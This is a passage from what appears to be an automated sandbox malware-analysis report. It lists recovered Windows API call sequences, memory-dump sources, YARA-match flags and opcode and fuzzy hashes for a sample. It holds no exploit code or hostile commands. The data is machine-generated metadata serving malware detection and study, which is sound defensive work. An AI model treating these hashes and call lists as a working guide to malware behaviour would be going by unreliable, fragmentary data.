                • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00405B0E
                • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00405B1B
                • TlsAlloc.KERNEL32(?,00404CC7), ref: 00405B6B
                • TlsSetValue.KERNEL32(00000000,?,00404CC7), ref: 00405B86
                • __init_pointers.LIBCMT ref: 00405B90
                • EncodePointer.KERNEL32(?,00404CC7), ref: 00405BA1
                • EncodePointer.KERNEL32(?,00404CC7), ref: 00405BAE
                • EncodePointer.KERNEL32(?,00404CC7), ref: 00405BBB
                • EncodePointer.KERNEL32(?,00404CC7), ref: 00405BC8
                • DecodePointer.KERNEL32(0040599B,?,00404CC7), ref: 00405BE9
                • __calloc_crt.LIBCMT ref: 00405BFE
                • DecodePointer.KERNEL32(00000000,?,00404CC7), ref: 00405C18
                • GetCurrentThreadId.KERNEL32 ref: 00405C2A
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.1259611506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000005.00000002.1259559481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000005.00000002.1259611506.0000000000410000.00000020.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000005.00000002.1260066044.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000005.00000002.1260150008.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000005.00000002.1260456772.000000000064A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_400000_66d5df681876c_file010924.jbxd
                Similarity
                • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                • API String ID: 3698121176-3819984048
                • Opcode ID: e453eff6c939e06595647a079e020d1d2a7e17ef9b33201e5048023e24f2b737
                • Instruction ID: ff93dc7fedceda27c5767def707d918571edc12705d56ca78e07cd01d157566a
                • Opcode Fuzzy Hash: e453eff6c939e06595647a079e020d1d2a7e17ef9b33201e5048023e24f2b737
                • Instruction Fuzzy Hash: 42314A71910714DBDB207F76AE09A573BE9EB49760B14463BE600A62F0DF789841CF5C
                APIs
                  • Part of subcall function 004057D1: EncodePointer.KERNEL32(00000000,00408E8A,004B9778,00000314,00000000,?,?,?,?,?,0040656D,004B9778,Microsoft Visual C++ Runtime Library,00012010), ref: 004057D3
                • LoadLibraryW.KERNEL32(USER32.DLL,004B9778,00000314,00000000), ref: 00408E9F
                • GetProcAddress.KERNEL32(00000000,MessageBoxW), ref: 00408EBB
                • EncodePointer.KERNEL32(00000000), ref: 00408ECC
                • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00408ED9
                • EncodePointer.KERNEL32(00000000), ref: 00408EDC
                • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00408EE9
                • EncodePointer.KERNEL32(00000000), ref: 00408EEC
                • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationW), ref: 00408EF9
                • EncodePointer.KERNEL32(00000000), ref: 00408EFC
                • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 00408F0D
                • EncodePointer.KERNEL32(00000000), ref: 00408F10
                • DecodePointer.KERNEL32(?,004B9778,00000314,00000000), ref: 00408F32
                • DecodePointer.KERNEL32 ref: 00408F3C
                • DecodePointer.KERNEL32(?,004B9778,00000314,00000000), ref: 00408F7B
                • DecodePointer.KERNEL32(?), ref: 00408F95
                • DecodePointer.KERNEL32(004B9778,00000314,00000000), ref: 00408FA9
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.1259611506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000005.00000002.1259559481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000005.00000002.1259611506.0000000000410000.00000020.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000005.00000002.1260066044.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000005.00000002.1260150008.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000005.00000002.1260456772.000000000064A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_400000_66d5df681876c_file010924.jbxd
                Similarity
                • API ID: Pointer$Encode$AddressDecodeProc$LibraryLoad
                • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL
                • API String ID: 1951731885-564504941
                • Opcode ID: 75b43804a2e143ef067d3df5407a0ff2623a6f5c28aa531d809509dfb2e5bd12
                • Instruction ID: 3bd6f5cb5e65ec75d1e460980babf14b029c5559ef115af35b4f11a111fc60cc
                • Opcode Fuzzy Hash: 75b43804a2e143ef067d3df5407a0ff2623a6f5c28aa531d809509dfb2e5bd12
                • Instruction Fuzzy Hash: 7B411F71A0020AABDF10EFB99E45E6F7AA9AF44350F14053AE544F3290DF78D9508F69
                APIs
                Memory Dump Source
                • Source File: 00000005.00000002.1261436866.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_23e0000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock
                • String ID:
                • API String ID: 1442030790-0
                • Opcode ID: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                • Instruction ID: 604ab5feef8a4dcd28fd72e2ec9b109d83b4735c4ef17f0525289c1bb9ec0422
                • Opcode Fuzzy Hash: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                • Instruction Fuzzy Hash: CE21A431104600AEE7217FA6D881E0F7BEAEF41B60B51843FF84A591E4EB3295E1CE55
                APIs
                • _memset.LIBCMT ref: 02403F51
                  • Part of subcall function 02405BA8: __getptd_noexit.LIBCMT ref: 02405BA8
                • __gmtime64_s.LIBCMT ref: 02403FEA
                • __gmtime64_s.LIBCMT ref: 02404020
                • __gmtime64_s.LIBCMT ref: 0240403D
                • __allrem.LIBCMT ref: 02404093
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 024040AF
                • __allrem.LIBCMT ref: 024040C6
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 024040E4
                • __allrem.LIBCMT ref: 024040FB
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02404119
                • __invoke_watson.LIBCMT ref: 0240418A
                Memory Dump Source
                • Source File: 00000005.00000002.1261436866.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_23e0000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                • String ID:
                • API String ID: 384356119-0
                • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                • Instruction ID: 724e201ded4fd59fa83da84354de96f0832be6e482ebc6dff0a59f912c1dffc0
                • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                • Instruction Fuzzy Hash: 0A71D671A00716ABD715DE7ACCC1B6AB7BAAF10364F14427FE915EA6C0E770D9808B90
                APIs
                Memory Dump Source
                • Source File: 00000005.00000002.1261436866.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_23e0000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson_wcscmp
                • String ID:
                • API String ID: 3432600739-0
                • Opcode ID: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                • Instruction ID: dc43e47775baf942520d74eb405aa70a695071e02aa94d49ee95c0890fbf6ae6
                • Opcode Fuzzy Hash: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                • Instruction Fuzzy Hash: 59410232904308AFDB00AFE5D9C0B9E3BAAAF04714F11483FEA06962D0CB7596D5DF61
                APIs
                Memory Dump Source
                • Source File: 00000005.00000002.1261436866.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_23e0000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _free$ExitProcess___crt
                • String ID:
                • API String ID: 1022109855-0
                • Opcode ID: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                • Instruction ID: 3e946346bab764581f476f4f44dde7e0d92d5f1f5612753d1338b1979afa4cce
                • Opcode Fuzzy Hash: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                • Instruction Fuzzy Hash: 013171319012509BCB215F55FDC484E77B6EB143247048A3FED096B3E0CBB459C9AE94
                APIs
                • std::exception::exception.LIBCMT ref: 0242FC1F
                  • Part of subcall function 0241169C: std::exception::_Copy_str.LIBCMT ref: 024116B5
                • __CxxThrowException@8.LIBCMT ref: 0242FC34
                • std::exception::exception.LIBCMT ref: 0242FC4D
                • __CxxThrowException@8.LIBCMT ref: 0242FC62
                • std::regex_error::regex_error.LIBCPMT ref: 0242FC74
                  • Part of subcall function 0242F914: std::exception::exception.LIBCMT ref: 0242F92E
                • __CxxThrowException@8.LIBCMT ref: 0242FC82
                • std::exception::exception.LIBCMT ref: 0242FC9B
                • __CxxThrowException@8.LIBCMT ref: 0242FCB0
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.1261436866.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_23e0000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Exception@8Throwstd::exception::exception$Copy_strstd::exception::_std::regex_error::regex_error
                • String ID: leM
                • API String ID: 3569886845-2926266777
                • Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                • Instruction ID: cbb561c3f44e8374dfee6c74ea468a0ce2479e7472dfcd8443afed7c64b1aa9e
                • Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                • Instruction Fuzzy Hash: F911BC79C0020DBBCF00FFA6D455CDEBB7DAA04744B408967AD1897645EB74A3488F94
                APIs
                Memory Dump Source
                • Source File: 00000005.00000002.1261436866.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_23e0000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _free_malloc_wprintf$_sprintf
                • String ID:
                • API String ID: 3721157643-0
                • Opcode ID: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                • Instruction ID: 1a985a73f5182d533df19aeff43f6b183efa1e7f9a5a626a4bfd2eed46018ec0
                • Opcode Fuzzy Hash: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                • Instruction Fuzzy Hash: 221157B25001602AC721A2F60C55FFF3BED9F45701F04057EFE4DE11C0DA685A0897B1
                APIs
                Memory Dump Source
                • Source File: 00000005.00000002.1261436866.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_23e0000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Exception@8Throw$_memset$_malloc_sprintf
                • String ID:
                • API String ID: 65388428-0
                • Opcode ID: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                • Instruction ID: 0f88faa518e063d591489bea1819bd0ea1fdb4fe8568da27cdb20c65a7450df4
                • Opcode Fuzzy Hash: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                • Instruction Fuzzy Hash: 8C514D71D40219EBDB11DBA6DC85FEFBBB9FF04744F10402AFA09B6180E7745A058BA5
                APIs
                • __getptd.LIBCMT ref: 00404FE3
                  • Part of subcall function 00405981: __getptd_noexit.LIBCMT ref: 00405984
                  • Part of subcall function 00405981: __amsg_exit.LIBCMT ref: 00405991
                • __amsg_exit.LIBCMT ref: 00405003
                • __lock.LIBCMT ref: 00405013
                • InterlockedDecrement.KERNEL32(?), ref: 00405030
                • _free.LIBCMT ref: 00405043
                • InterlockedIncrement.KERNEL32(02522D90), ref: 0040505B
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.1259611506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000005.00000002.1259559481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000005.00000002.1259611506.0000000000410000.00000020.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000005.00000002.1260066044.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000005.00000002.1260150008.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000005.00000002.1260456772.000000000064A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_400000_66d5df681876c_file010924.jbxd
                Similarity
                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                • String ID: ( J
                • API String ID: 3470314060-3398582886
                • Opcode ID: 34ad38f7c54dc83f41d7761572d6cf32181336fbf46893ce656edfbc391585dd
                • Instruction ID: bc3f2a170a03e6d1ed12ad22bd1d06453275e924241b71422263d52d5a5e05e0
                • Opcode Fuzzy Hash: 34ad38f7c54dc83f41d7761572d6cf32181336fbf46893ce656edfbc391585dd
                • Instruction Fuzzy Hash: 1F018B75900A12ABC721AB29990575FBBA0AB09728F05003BE940776D1CB7CA842EFDD
                APIs
                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,004A1380,00000008,0040595C,00000000,00000000,?,00404594,?,00000000,004039DD), ref: 00405865
                • __lock.LIBCMT ref: 00405899
                  • Part of subcall function 00406A1F: __mtinitlocknum.LIBCMT ref: 00406A35
                  • Part of subcall function 00406A1F: __amsg_exit.LIBCMT ref: 00406A41
                  • Part of subcall function 00406A1F: EnterCriticalSection.KERNEL32(00000000,00000000,?,0040589E,0000000D), ref: 00406A49
                • InterlockedIncrement.KERNEL32(?), ref: 004058A6
                • __lock.LIBCMT ref: 004058BA
                • ___addlocaleref.LIBCMT ref: 004058D8
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.1259611506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000005.00000002.1259559481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000005.00000002.1259611506.0000000000410000.00000020.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000005.00000002.1260066044.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000005.00000002.1260150008.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000005.00000002.1260456772.000000000064A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_400000_66d5df681876c_file010924.jbxd
                Similarity
                • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                • String ID: ( J$KERNEL32.DLL
                • API String ID: 637971194-38078593
                • Opcode ID: 54b149fa29c665a3b07f048601e02bcd21d22eaf12896e65975971bd61ffc5db
                • Instruction ID: 24a26b9e2260a12e30a1db9a323024d0000528331ba520c35167c1df9dc3c7be
                • Opcode Fuzzy Hash: 54b149fa29c665a3b07f048601e02bcd21d22eaf12896e65975971bd61ffc5db
                • Instruction Fuzzy Hash: E1018E71800B00EED720AF66D90670ABBE0EF55328F10892FE596766E0CBB8A554CF18
                APIs
                Memory Dump Source
                • Source File: 00000005.00000002.1261436866.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_23e0000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Exception@8Throw$_memset_sprintf
                • String ID:
                • API String ID: 217217746-0
                • Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                • Instruction ID: 06630badc8b561ea3ec24d3523fc71f2099607ce17120d1ddddc761c8a0aa49a
                • Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                • Instruction Fuzzy Hash: F4513071D40219EADF11DFA1DC46FEEBB79EB04704F10412AFA06B61C0D7B5AA058BA5
                APIs
                Memory Dump Source
                • Source File: 00000005.00000002.1261436866.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_23e0000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Exception@8Throw$_memset_sprintf
                • String ID:
                • API String ID: 217217746-0
                • Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                • Instruction ID: 8b7a7c7711bedfe36c103307d9217dd71dc458ec5b8b238ae2f4964602aa567c
                • Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                • Instruction Fuzzy Hash: 2A514371D40259AADF21DFA1DC45FEFBBB9EF04704F10412AFA06B61C0D7756A058BA4
                APIs
                Memory Dump Source
                • Source File: 00000005.00000002.1261436866.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_23e0000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: __getenv_helper_nolock$__getptd_noexit__invoke_watson__lock_strlen_strnlen
                • String ID:
                • API String ID: 3534693527-0
                • Opcode ID: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                • Instruction ID: c5bcf38a42bb97232a9bc87917eb64a4a73368e9d49bda5c5f18d8d7d88342f2
                • Opcode Fuzzy Hash: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                • Instruction Fuzzy Hash: ED310A329042316BDB21EB67DC40B6F37559F05B24F91402BEE04EB3C4DBB48585CEA1
                APIs
                • __getptd_noexit.LIBCMT ref: 024A66DD
                  • Part of subcall function 024059BF: __calloc_crt.LIBCMT ref: 024059E2
                  • Part of subcall function 024059BF: __initptd.LIBCMT ref: 02405A04
                • __calloc_crt.LIBCMT ref: 024A6700
                • __get_sys_err_msg.LIBCMT ref: 024A671E
                • __invoke_watson.LIBCMT ref: 024A673B
                • __get_sys_err_msg.LIBCMT ref: 024A676D
                • __invoke_watson.LIBCMT ref: 024A678B
                Memory Dump Source
                • Source File: 00000005.00000002.1261436866.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_23e0000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: __calloc_crt__get_sys_err_msg__invoke_watson$__getptd_noexit__initptd
                • String ID:
                • API String ID: 4066021419-0
                • Opcode ID: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                • Instruction ID: 6088c7af56af277007307359f0731431ce41de2f7d7a73c7ce915a7cccecbe32
                • Opcode Fuzzy Hash: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                • Instruction Fuzzy Hash: 031108356016146BEF212E66DC50B6B738DDF20B60F06043BFE0496340E731DD404AE4
                APIs
                • _malloc.LIBCMT ref: 00409A90
                  • Part of subcall function 00404777: __FF_MSGBANNER.LIBCMT ref: 00404790
                  • Part of subcall function 00404777: __NMSG_WRITE.LIBCMT ref: 00404797
                  • Part of subcall function 00404777: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,00407DBE,00000000,00000001,00000000,?,004069AA,00000018,004A13D0,0000000C,00406A3A), ref: 004047BC
                • _free.LIBCMT ref: 00409AA3
                Memory Dump Source
                • Source File: 00000005.00000002.1259611506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000005.00000002.1259559481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000005.00000002.1259611506.0000000000410000.00000020.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000005.00000002.1260066044.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000005.00000002.1260150008.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000005.00000002.1260456772.000000000064A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_400000_66d5df681876c_file010924.jbxd
                Similarity
                • API ID: AllocHeap_free_malloc
                • String ID:
                • API String ID: 2734353464-0
                • Opcode ID: 2b223fead71153d923d65b16adf7dbaac1e17d84e9be0525e066f0adeda1b706
                • Instruction ID: 811332a90f73e159becba367169f8b593f12006e13c95f9776a1461875f5fd7d
                • Opcode Fuzzy Hash: 2b223fead71153d923d65b16adf7dbaac1e17d84e9be0525e066f0adeda1b706
                • Instruction Fuzzy Hash: 8111C8326009559BCB212F75E804A5B3A94DB503A5B20443BF949BA2E2EF7D8C409A9C
                APIs
                • __getptd.LIBCMT ref: 00405764
                  • Part of subcall function 00405981: __getptd_noexit.LIBCMT ref: 00405984
                  • Part of subcall function 00405981: __amsg_exit.LIBCMT ref: 00405991
                • __getptd.LIBCMT ref: 0040577B
                • __amsg_exit.LIBCMT ref: 00405789
                • __lock.LIBCMT ref: 00405799
                • __updatetlocinfoEx_nolock.LIBCMT ref: 004057AD
                Memory Dump Source
                • Source File: 00000005.00000002.1259611506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000005.00000002.1259559481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000005.00000002.1259611506.0000000000410000.00000020.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000005.00000002.1260066044.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000005.00000002.1260150008.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000005.00000002.1260456772.000000000064A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_400000_66d5df681876c_file010924.jbxd
                Similarity
                • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                • String ID:
                • API String ID: 938513278-0
                • Opcode ID: bfe58fe74ae8f077a6f47e7b6f5d95cbe904bd6c7025e02d9fcc56d2649cf320
                • Instruction ID: 3c8245ced7475295900e9638de439af8fe1fd081d79cc071e6c19f6c0352b67a
                • Opcode Fuzzy Hash: bfe58fe74ae8f077a6f47e7b6f5d95cbe904bd6c7025e02d9fcc56d2649cf320
                • Instruction Fuzzy Hash: F2F06D72944B10DAD625BB695C02B2F77A0EF01B28F11012FE915772D2CB7C5901AE5E
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.1261436866.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_23e0000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _memset
                • String ID: D
                • API String ID: 2102423945-2746444292
                • Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                • Instruction ID: ee39e0b8552159428e64225e58bb914e391dcbeacf82556c38611c6062e63fd2
                • Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                • Instruction Fuzzy Hash: 7DE14E71D00219EADF64DBA0DD89FEFB7B8BF04304F14406AEA09A7190EB746A85CF54
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.1261436866.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_23e0000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _memset
                • String ID: $$$(
                • API String ID: 2102423945-3551151888
                • Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                • Instruction ID: 682e4a7c09cddf39b2926fe667e1d4694309edc36146282549abb94da93fa710
                • Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                • Instruction Fuzzy Hash: E791BD71C0021DEAEF21DBA0DC49BEEBBB9AF05304F244069D516772C1DBB65A88CF65
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.1261436866.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_23e0000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _wcsnlen
                • String ID: U
                • API String ID: 3628947076-3372436214
                • Opcode ID: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                • Instruction ID: e02f31681eef060ec312a9691f5157ca0ba6d3dc1392b4444e4e954bcfab2c90
                • Opcode Fuzzy Hash: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                • Instruction Fuzzy Hash: 5D21DB326182087AEB009BA59C85BBB73ADEB45750F90417BF909C62D0FB71DDC18E94
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.1261436866.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_23e0000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _memset
                • String ID: p2Q
                • API String ID: 2102423945-1521255505
                • Opcode ID: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                • Instruction ID: fceb247a98a3295598ef1f65c092aae5048ad097a1454ffcda4d821173cb3234
                • Opcode Fuzzy Hash: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                • Instruction Fuzzy Hash: 4EF06D38698751A5F7227750BC66B857E81BF31B08F004098E1182E2E0D3FD238CA79E
                APIs
                • std::exception::exception.LIBCMT ref: 0242FBF1
                  • Part of subcall function 0241169C: std::exception::_Copy_str.LIBCMT ref: 024116B5
                • __CxxThrowException@8.LIBCMT ref: 0242FC06
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.1261436866.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_23e0000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Copy_strException@8Throwstd::exception::_std::exception::exception
                • String ID: TeM$TeM
                • API String ID: 3662862379-3870166017
                • Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                • Instruction ID: 2f136185ac240902b3f433eae773cef76512ebc77ed28f953a5742a325593622
                • Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                • Instruction Fuzzy Hash: F7D06775C0020CBBCB00EFA6D459CDDBBB9AA04744B00C467AA1897245EA74A3498F94
                APIs
                  • Part of subcall function 0240197D: __wfsopen.LIBCMT ref: 02401988
                • _fgetws.LIBCMT ref: 023ED15C
                Memory Dump Source
                • Source File: 00000005.00000002.1261436866.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_23e0000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: __wfsopen_fgetws
                • String ID:
                • API String ID: 853134316-0
                • Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                • Instruction ID: e7a643889bd38af9eeb6793a367884820683d1fb4f1573f9937b04a9be4ed62c
                • Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                • Instruction Fuzzy Hash: E691A371D1032D9BCF21DFA4DC857AEB7B9AF04304F14052AE81AA72C0E775EA48CB95
                APIs
                Memory Dump Source
